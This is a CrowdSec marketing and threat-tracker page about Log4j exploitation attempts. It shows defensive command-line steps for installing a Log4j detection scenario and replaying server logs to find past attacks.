Live Log4J - The open-source & collaborative IPS

Live Log4J

threat tracker

This report includes real-time data reported by the CrowdSec Community. IPs originating from known public scanners are discarded from this report (mostly IPs from Germany) but are included in our full IP list available in this Gist.

Join the CrowdSec community and start reporting & remediating rogue IPs scanning for the Log4j vulnerabilities and many more. Get it here!

CrowdSec helps detect and mitigate Log4j exploits

The Log4j vulnerability impacts countless organizations. CrowdSec released a scenario that will help detect and block exploitation attempts of the vulnerability. This new scenario can be directly downloaded from our Hub and installed in a blink of an eye. Check this quick video to see the plugin in action:

As CrowdSec is all about crowd power and given the size of our quickly growing network, we are collecting a lot of IP addresses attempting to exploit this vulnerability. You can check the list here. It is updated several times a day and, needless to say, you should block the ones that are “validated”.

Those IP addresses were curated by our consensus algorithm, meaning they had a lot of votes against them coming from our user network. The ones in “not enough data” state are highly suspicious but can still contain some false positives, up to you. The ones categorized as “benign” are IPs used by people that usually are on the good side of the fence, they probably scan to help and not to undermine.

Alternatively, you can use our replay mode to analyze your servers’ logs to check if exploitation of Log4j was attempted at your place, by who and when, using the appropriate scenario and the below command line:

sudo cscli hub update
sudo cscli scenarios install crowdsecurity/apache_log4j2_cve-2021-44228
sudo systemctl reload crowdsec

# sudo crowdsec --dsn "file://<log_file_path>" -no-api --type <log_type>
sudo crowdsec --dsn "file:///var/log/nginx/access.log" -no-api --type nginx

sudo cscli alerts list --scenario crowdsecurity/apache_log4j2_cve-2021-44228
Join the crowd

Cybercriminals constantly collaborate together, on a world scale. Each IP they control are anonymity tokens to hide their hacktivities. Our only chance is to stand as a crowd and act in a coordinated way, as they do. When you, Sysadmins, Devops & Secops join forces, you outnumber them and can burn their IPs one by one, crippling this precious anonymity.

  • 0B089598-964A-4610-8424-5B9BA76E04EF

    2.5M rogue IPs detected

  • DB3489A0-E3FC-4AF5-BFC0-C20F5E521A89

    5.1k stars on GitHub

  • Icon/KeyNumbers/countries

    158 countries